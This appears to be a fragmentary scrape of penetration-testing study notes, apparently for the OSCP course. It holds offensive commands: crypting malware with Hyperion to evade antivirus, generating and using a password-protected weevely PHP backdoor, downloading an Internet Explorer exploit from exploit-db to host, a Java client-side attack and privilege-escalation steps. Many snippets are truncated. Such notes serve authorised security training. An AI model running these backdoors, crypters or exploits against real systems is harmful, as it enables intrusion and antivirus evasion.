There are many pages on the web documenting quick reverse shell one liners.
Pentestmonkey and Bernardo Damele have both created a good few posts between
them but I wanted to recapture what they’ve got for my notes purposes.
(It’s easier for me to find stuff if it’s in one place).
All credit goes to both of those guys where I got all t...
Penetration Testing: What You Should Know
About Kali Linux
About Penetration Testing
The megacorpone.com Domain
Offensive Security Labs
Getting Comfortable with Kali Linux
Finding Your Way Around Kali
Managing Kali Linux Services
The Bash Environment
Intro to Bash Scripting
Crypting Known Malware with Software Protectors
One such open source crypter, called Hyperion
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3...
See Metasploit Unleashed Course in the Essentials
Search for exploits using Metasploit GitHub framework source code:
Translate them for use on OSCP LAB or EXAM.
MetaSploit requires Postfresql
systemctl start postgresql
Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port
apt-get install rinetd
# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
SSH Local Port Forwarding: supports bi-directional communicatio...
Convert multiple webpages into a word list
for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \
Or convert html to word ...
Web Shag Web Application Vulnerability Assessment Platform
ls -l /usr/share/webshells/
Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t
MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start
JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.
Linux Client Shells
Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:
net user "%username%"
Try the getsystem command using meterpreter - rarely works but is worth a try.
Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Try the obvious - Maybe the user is root or can sudo to root:
Here are the commands I have learned to use to perform linux enumeration and privledge escal...